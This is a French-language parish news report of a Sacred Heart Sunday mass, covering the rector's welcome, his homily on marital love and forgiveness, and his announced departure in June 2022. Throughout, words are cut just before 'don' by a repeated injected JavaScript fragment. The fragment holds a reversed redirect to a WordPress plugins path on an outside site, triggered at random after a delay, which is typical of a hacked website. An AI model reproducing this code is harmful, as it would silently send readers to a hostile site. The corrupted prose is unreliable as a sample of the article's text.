La célébration eucharistique de ce dimanche du Sacré Cœur de Jésus a connu d’autres événements aussi importants. Il a coïncidé avec la clôture de l’année dédiée aux familles, le dimanche de la Parole de Dieu et aussi un dernier dimanche du mois qui habituellement connaît un pèlerinage vers le sanctuaire chaque fois à la fin de la Messe de 10 heures. Suite à toutes ces cérémonies, l’ordre de la procession du début de la messe a inclus quatre personnes du groupe MUKAMA MENYEKANA portant la Bible et quelques familles choisies pour représenter les autres. Ceux-ci se sont ajoutés aux autres catégories qui sont presque toujours présents dans des processions du début et de fin de la Messe, comme la croix qui est toujours en avant, les servants de messe, la chorale du jour et les prêtres qui clôturent la suite de la procession.

Dans son discours d’accueil prononcé au début de la sainte Messe, le Père Recteur du Sanctuaire a souhaité la bienvenue à tout un chacun en ce temple du Seigneur. Il a rappelé que nous sommes venus en procession avec la Parole de Dieu comme les Israélites lors du retour de l’exil. En ce dernier dimanche du mois de juin, nous nous nous sommes réunis pour remercier Dieu qui nous a toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}donné des familles où grandir. Nous sommes unis à tous les couples qui sont réunis à Rome tout au long de cette semaine autour du Pape pour méditer sur la vie de couples et de la famille. Le Père Recteur a en outre félicité tout fidèle qui croit dans le sang et l’eau versés de la côte de Jésus ouvert par la lance d’un soldat parmi ceux qui l’avaient pendu sur la Croix. C’est de cette côte, en effet, que la fête d’aujourd’hui trouve son origine. Les Sœurs Oblates du Sacré Cœur de Jésus l’ont bien compris et ont bâti leur charisme sur cette dévotion. Après cette brève allocution, le Père Recteur du Sanctuaire a procédé à la Messe comme à l’ordinaire. Les lectures du jour ont été respectivement tirés du Livre d’Ezéchiel (34, 11-16), de l’Epitre de saint Paul aux Romains (5, 5b-11) et l’Evangile selon saint Luc (15, 3-7).

Homélie du jour

Après la lecture des textes du jour, le Père Recteur a prêché son homélie au cours de laquelle il a précisé que nous contemplons, du côté ouvert de Jésus, l’amour infini que Dieu a pour nous son peuple. Hier, nous avons fêté le Cœur Immaculé de Marie, et voilà qu’en ce dimanche nous célébrons le Sacré Cœur de Jésus. Tout ceci se passe alors que nous sommes dans la joie de clôture de l’année que le Saint Siège avait dédiée aux familles. Qu’il y ait des gens qui ont oublié que cette année avait été dédiée aux familles, ne soyez pas tourmentés à cause de cela car toute l’Eglise a prié pour nous tous afin que toutes les familles vivent dans l’amour, la paix et la tranquillité. La Parole de Dieu que nous avons entendue, et même le Psaume 22 que nous avons chanté nous ont aidé à comprendre et à nous représenter l’image du Sacré Cœur de Jésus, un cœur qui a tant aimé la personne humaine jusqu’à accepter d’être transpercé par une lance.

Dans ses écrits, saint Paul nous dit que c’est quand nous étions faibles que Jésus est mort pour nous. Il n’a pas attendu que nous soyons saints devant la face du Seigneur pour mourir pour nous, car il lui serait difficile de mourir pour des personnes justes. ‘Vous hommes et femmes, vous avez reçu la bénédiction de manifester l’amour du Christ ici sur terre et je vous en respecte tout comme je vous contempleVous êtes toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}donc le sacrement de l’amour de Dieu. Faites un regard sur l’amour toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dont vous vous aimez et comparez-le à celui toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dont vous vous aimiez lors de vos fiançailles. L’appréciation que vous en ferez, c’est cela le miroir que je vous offre pour vous juger vous-mêmes’, a martelé le Père COYITUNGIYE.

 Demeurer dans l’amour de Dieu signifie se contempler. Pourquoi est-il difficile de se reconnaître pécheurs ? Toi l’homme, ne partoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}donne-tu pas à ta femme dans sa faiblesse ? Et toi femme, pourquoi ne partoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}donnes-tu pas à ton mari en même temps que tu n’acceptes pas ta faute devant ton mari ? Aussi longtemps que nous sommes dans cet état de non-reconnaissance de nos fautes, nous ne pouvons vraiment pas célébrer la fête du Sacré Cœur de Jésus. Vous hommes et femmes, ne vous dites pas que vous vous aimerez quand vous serez saint l’un et l’autre, car il est fort probable que toi homme ou femme tu as une grande part de responsabilité dans les erreurs de l’autre. ‘Tu n’as pas le droit d’oublier que Dieu t’a fait gardien ou gardienne de ta femme ou de ton mari. Toi femme, ton mari est la seule image du Sacré Cœur de Jésus pour toi ; et toi homme, la seule image de la Vierge Marie pour toi c’est bien ta femme’, a précisé le Père Recteur sortant. Dans la ligne d’idées, ne pensez plus au malheur que ta femme ou ton mari te cause, pense plutôt au malheur que toi tu lui causes. Les enfants toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}doivent aussi faire de même envers leurs parents. Même nous les prêtres et les religieuses, nous vous regartoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dons et voyons en vous l’image du Sacré Cœur de Jésus. Et en nous contemplant les uns les autres, nous sentirons la joie de demeurer dans l’amour de Dieu et le monde changera vers sa perfection.

Signalons qu’au moment de l’offertoire, deux symboles ont été offerts en plus des offrandes en nature. Il s’agissait d’un bouquet de fleurs offert par une jeune fille en signe de remerciement pour toutes les grâces reçues durant cette année dédiée aux familles, et l’image de la Sainte Famille portée par un couple. A la fin de la Messe, il y a eu procession vers le Sanctuaire et c’est en principe là que la bénédiction finale et solennelle a été toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}donnée aux fidèles. Mais avant celle-ci, le Recteur du Sanctuaire a présenté les prêtres qui ont concélébré avec lui l’eucharistie et a informé les fidèles que son mandant en tant Recteur du Sanctuaire prendra fin le 30 juin 2022 et que c’est le dimanche prochain le 03 juillet qu’il y aura remise et prise entre lui et son successeur. Il a toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}donc invité les fidèles à prier pour cet évènement.

NYANDWI M.